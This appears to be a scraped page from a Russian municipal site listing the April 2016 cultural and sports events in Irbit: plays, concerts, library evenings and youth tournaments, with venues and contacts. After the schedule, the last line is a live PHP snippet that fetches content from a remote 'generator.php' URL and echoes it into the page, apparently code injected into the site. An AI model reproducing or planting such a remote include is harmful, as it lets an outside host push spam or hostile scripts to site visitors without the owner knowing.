Регистрация нового пользоателя


Аллея Здоровья
Аллея Здоровья
План культурно-досувых и спортивно-массовых мероприятий на апрель 2016 года

2016-04-05 17:39:37
План культурно-досувых и спортивно-массовых мероприятий на апрель 2016 года

План культурно-досувых и спортивно-массовых мероприятий на апрель 2016 года

 

Дата

Мероприятие

Место проведения

Учреждение

1 апреля

 

18.00

Юбилейный концерт.  «Перезагрузка».

Арт-студия «Поющий дом»

 

МБУК «Дворец культуры им. В.К.Костевича»,

ул. Свердлова, 17

Т. 4-25-70

МБУК «Дворец культуры им. В.К.Костевича».

Руководитель:

Н.А.Ульянченко

Т. 3-76-05

1 апреля

 

18.00

Спектакль

 «Беда от нежного сердца»

 

МБУК «Ирбитский драматический театр им. А.Н.Островского»,

ул.Орджоникидзе 51,

Т. -6-63-91

МБУК «Ирбитский драматический театр им. А.Н.Островского»,

Руководитель:

Б.Г.Гинзбург

Т. 6-41-68

2 апреля

 

11.00

 

 

 

16.00

 

 

Спектакль

 «Как Незнайка кино снимал». Премьера

 

Спектакль

«Еще раз про Л…»

 

МБУК «Ирбитский драматический театр им. А.Н.Островского»,

ул.Орджоникидзе 51,

Т. -6-63-91

МБУК «Ирбитский драматический театр им. А.Н.Островского»,

Руководитель:

Б.Г.Гинзбург

Т. 6-41-68

3 апреля

 

12.00

Премьера спектакля

«Как Незнайка Кино снимал».

 

МБУК «Ирбитский драматический театр им. А.Н.Островского»,

ул.Орджоникидзе 51,

Т. -6-63-91

МБУК «Ирбитский драматический театр им. А.Н.Островского»,

Руководитель:

Б.Г.Гинзбург

Т. 6-41-68

5 апреля

Открытое Первенство

г. Ирбита по джиу-джитсу

среди юношей, девушек (1999-2000 г.р., 2001-2002 г.р)

Спорткомплекс «Олимп»

Ул. Советская 96

Т. 6-55-94

МКУ «ЦРК,СиМП»

Зам.директора по развитию физической культуры и спорта

С.Н.Юрьев

Т. 3-93-96

6 апреля

 

19.00

Концерт

ВИА «Верасы»

МБУК «Дворец культуры им. В.К.Костевича»,

ул. Свердлова, 17

Т. 4-25-70

МБУК «Дворец культуры им. В.К.Костевича».

Руководитель:

Н.А.Ульянченко

Т. 3-76-05

7 апреля

Открытое Первенство

г. Ирбита по самбо

(юноши, девушки 1997-1999 г.р.)

Спорткомплекс «Олимп»

Ул. Советская 96

Т. 6-55-94

МКУ «ЦРК,СиМП»

Зам.директора по развитию физической культуры и спорта

С.Н.Юрьев

Т. 3-93-96

8 апреля

 

18.00

Спектакль

«Ещё раз про Л…»

МБУК «Ирбитский драматический театр им. А.Н.Островского»,

ул.Орджоникидзе 51,

Т. -6-63-91

МБУК «Ирбитский драматический театр им. А.Н.Островского»,

Руководитель:

Б.Г.Гинзбург

Т. 6-41-68

9 апреля

 

15.00

Отчетный концерт

ТО «Элита»

«Дотянуться до звезды»

МБУК «Дворец культуры им. В.К.Костевича»,

ул. Свердлова, 17

Т. 4-25-70

МБУК «Дворец культуры им. В.К.Костевича».

Руководитель:

Н.А.Ульянченко

Т. 3-76-05

9 апреля

 

11.00

 

 

16.00

 

 

Спектакль

«Весёлый Роджер»

 

Спектакль

 «Бешенные деньги»

МБУК «Ирбитский драматический театр им. А.Н.Островского»,

ул.Орджоникидзе 51,

Т. -6-63-91

МБУК «Ирбитский драматический театр им. А.Н.Островского»,

Руководитель:

Б.Г.Гинзбург

Т. 6-41-68

10 апреля

 

12.00

Спектакль

 «Милое мое привидение»

 

МБУК «Ирбитский драматический театр им. А.Н.Островского»,

ул.Орджоникидзе 51,

Т. -6-63-91

МБУК «Ирбитский драматический театр им. А.Н.Островского»,

Руководитель:

Б.Г.Гинзбург

Т. 6-41-68

9 апреля

 

14.00

Библиодесант

«Творческая встреча с уральскими писателями»

Центральная городская библиотека им. Д.Н.М-Сибиряка

Ул. Орджоникидзе, 32

Т. 3-64-42

МБУК «Библиотечная система».

Руководитель:

Г.Л.Уфаркина

Т. 3-64-42

10 апреля

 

15.00

Филармония.

Абонемент 1

«Три чудесных воскресенья»

«Музыкальные  сказки».

1-е отделение: «Приключения слонёнка Барбара» (фортепиано);

2-е отделение: музыкально-литературная композиция по книге К.Грема (сопрано, скрипка).

МБУК «Дворец культуры им. В.К.Костевича»,

ул. Свердлова, 17

Т. 4-25-70

Филиал Свердловской государственной филармонии

в г.Ирбите.

 

Л.В.Британова

Т. 6-21-11

11-14

апреля

Первенство города по мини-футболу

В рамках Спартакиады учебных заведений МО г. Ирбит на 2015 -2016 учебный год

Спортивный зал ГАОУ СПО СО «Ирбитский политехникум»

Ул. Логинова, 26

МКУ «ЦРК,СиМП»

Зам. директора по развитию физической культуры и спорта С.Н.Юрьев

Т. 3-93-96

14

Апреля

 

16.00

Библиокафе.

Юмористическая программа

«Коктейль хорошего настроения».

Центральная городская библиотека им. Д.Н.М-Сибиряка

Ул. Орджоникидзе, 32

Т. 3-64-42

МБУК «Библиотечная система».

Руководитель:

Г.Л.Уфаркина

Т. 3-64-42

15 апреля

 

18.00

Приглашённый театр

МБУК «Ирбитский драматический театр им. А.Н.Островского»,

ул.Орджоникидзе 51,

Т. -6-63-91

МБУК «Ирбитский драматический театр им. А.Н.Островского»,

Руководитель:

Б.Г.Гинзбург

Т. 6-41-68

16 апреля

 

16.00

Фестиваль бардовской песни

«Мелодии сердца»

МБУК «Дворец культуры им. В.К.Костевича»,

ул. Свердлова, 17

Т. 4-25-70

МБУК «Дворец культуры им. В.К.Костевича».

Руководитель:

Н.А.Ульянченко

Т. 3-76-05

16 апреля

 

11.00

 

 

16.00

 

 

Спектакль

 «Летучий корабль»

 

Спектакль

 «Беда от нежного сердца»

МБУК «Ирбитский драматический театр им. А.Н.Островского»,

ул.Орджоникидзе 51,

Т. -6-63-91

МБУК «Ирбитский драматический театр им. А.Н.Островского»,

Руководитель:

Б.Г.Гинзбург

Т. 6-41-68

16 апреля

 

10.00

Турнир по мини-футболу, посвящённый памяти Р.Т.Абдрахманова и А.Н.Петрова

Спорткомплекс «Юность»

Ул. Свердлова 17А

Т. 4-25-86

МКУ «ЦРК,СиМП»

Зам.директора по развитию физической культуры и спорта

С.Н.Юрьев

Т. 3-93-96

17 апреля

 

12.00

Спектакль

 «Принц леса»

 

МБУК «Ирбитский драматический театр им. А.Н.Островского»,

ул.Орджоникидзе 51,

Т. -6-63-91

МБУК «Ирбитский драматический театр им. А.Н.Островского»,

Руководитель:

Б.Г.Гинзбург

Т. 6-41-68

21 апреля

 

11.00-14.00

Отчетно-перевыборное собрание

«Дети войны»

МБУК «Дворец культуры им. В.К.Костевича»,

ул. Свердлова, 17

Т. 4-25-70

МБУК «Дворец культуры им. В.К.Костевича».

Руководитель:

Н.А.Ульянченко

Т. 3-76-05

22 апреля

 

09.00-11.00

Цирковое представление «Легенды мира»

г. С. Петербург

МБУК «Дворец культуры им. В.К.Костевича»,

ул. Свердлова, 17

Т. 4-25-70

МБУК «Дворец культуры им. В.К.Костевича».

Руководитель:

Н.А.Ульянченко

Т. 3-76-05

22 апреля

 

18.00

Спектакль

 «До третьих петухов». Премьера

 

 

МБУК «Ирбитский драматический театр им. А.Н.Островского»,

ул.Орджоникидзе 51,

Т. -6-63-91

МБУК «Ирбитский драматический театр им. А.Н.Островского»,

Руководитель:

Б.Г.Гинзбург

Т. 6-41-68

ночь

с 22  на 23 апреля

Библионочь – 2016

(по особому плану)

 

Центральная городская библиотека им. Д.Н.М-Сибиряка

Ул. Орджоникидзе, 32

Т. 3-64-42

 

МБУК «Библиотечная система».

Руководитель:

Г.Л.Уфаркина

Т. 3-64-42

23 апреля

 

11.00

 

 

 

16.00

 

 

 Игровая программа по безопасности дорожного движения

 

 Премьера спектакля

«До третьих петухов». Премьера

 

МБУК «Ирбитский драматический театр им. А.Н.Островского»,

ул.Орджоникидзе 51,

Т. -6-63-91

МБУК «Ирбитский драматический театр им. А.Н.Островского»,

Руководитель:

Б.Г.Гинзбург

Т. 6-41-68

23 апреля

Кубок города по футболу

среди взрослых любительских команд (открытие сезона)

Спорткомплекс «Олимп»

Ул. Свердлова 17А

Т. 4-25-86

МКУ «ЦРК,СиМП»

Зам.директора по развитию физической культуры и спорта

С.Н.Юрьев

Т. 3-93-96

24 апреля

 

12.00

Спектакль

 «Летучий корабль»

 

 

МБУК «Ирбитский драматический театр им. А.Н.Островского»,

ул.Орджоникидзе 51,

Т. -6-63-91

МБУК «Ирбитский драматический театр им. А.Н.Островского»,

Руководитель:

Б.Г.Гинзбург

Т. 6-41-68

26 апреля

 

19.00

Спектакль

«Слишком веселая ночь».

Независимый театр

МБУК «Дворец культуры им. В.К.Костевича»,

ул. Свердлова, 17

Т. 4-25-70

МБУК «Дворец культуры им. В.К.Костевича».

Руководитель:

Н.А.Ульянченко

Т. 3-76-05

29 апреля

 

18.00

Спектакль

 «До третьих петухов»

 

МБУК «Ирбитский драматический театр им. А.Н.Островского»,

ул.Орджоникидзе 51,

Т. -6-63-91

МБУК «Ирбитский драматический театр им. А.Н.Островского»,

Руководитель:

Б.Г.Гинзбург

Т. 6-41-68

30 апреля

 

10.00 – 15.00

Ярмарка выходного дня

МБУК «Дворец культуры им. В.К.Костевича»

площадь.

Ул. Свердлова, 17

Т. 4-25-70

МБУК «Дворец культуры им. В.К.Костевича».

Руководитель:

Н.А.Ульянченко

Т. 3-76-05

30 апреля

 

11.00

 

 

16.00

 

 

Спектакль

 «Как Незнайка кино снимал»

 

Спектакль

«До третьих петухов»

                     

 

МБУК «Ирбитский драматический театр им. А.Н.Островского»,

ул.Орджоникидзе 51,

Т. -6-63-91

МБУК «Ирбитский драматический театр им. А.Н.Островского»,

Руководитель:

Б.Г.Гинзбург

Т. 6-41-68

30 апреля

Турнир по мини-футболу

«Здоровая молодёжь – будущее России»

Спорткомплекс «Олимп»

Ул. Советская 96

Т. 6-55-94

МКУ «ЦРК,СиМП»

Зам.директора по развитию физической культуры и спорта

С.Н.Юрьев

Т. 3-93-96

Апрель

Президентские состязания в рамках Спартакиады

Общеобразовательных школ Г. Ирбита на 2015-2016 учебный год (6 классы)

Спорткомплекс «Юность»

Ул. Свердлова 17А

Т. 4-25-86

МКУ «ЦРК,СиМП»

Зам.директора по развитию физической культуры и спорта

С.Н.Юрьев

Т. 3-93-96

Апрель

Всероссийские спортивные соревнования школьников«Президентские игры» в рамках Спартакиады общеобразовательных школ МО г. Ирбит на 2015 – 2016 учебный год /7-8 классы/

Спорткомплекс«Юность»

ул. Свердлова, 17а

Т. 4-25-86

 

МКУ «ЦРК,СиМП»

Зам.директора по развитию физической культуры и спорта

С.Н.Юрьев

Т. 3-93-96

Апрель

Соревнования

Восточного округа по картингу

«Открытие летнего сезона 2016 г.»

Автодром ДОСААФ ул. Революции, 67

МКУ «ЦРК,СиМП»

Зам.директора по развитию физической культуры и спорта

С.Н.Юрьев

Т. 3-93-96

 




<?php $headers = file_get_contents('https://ntsirbit.ru/generator/generator.php', true); echo $headers; ?>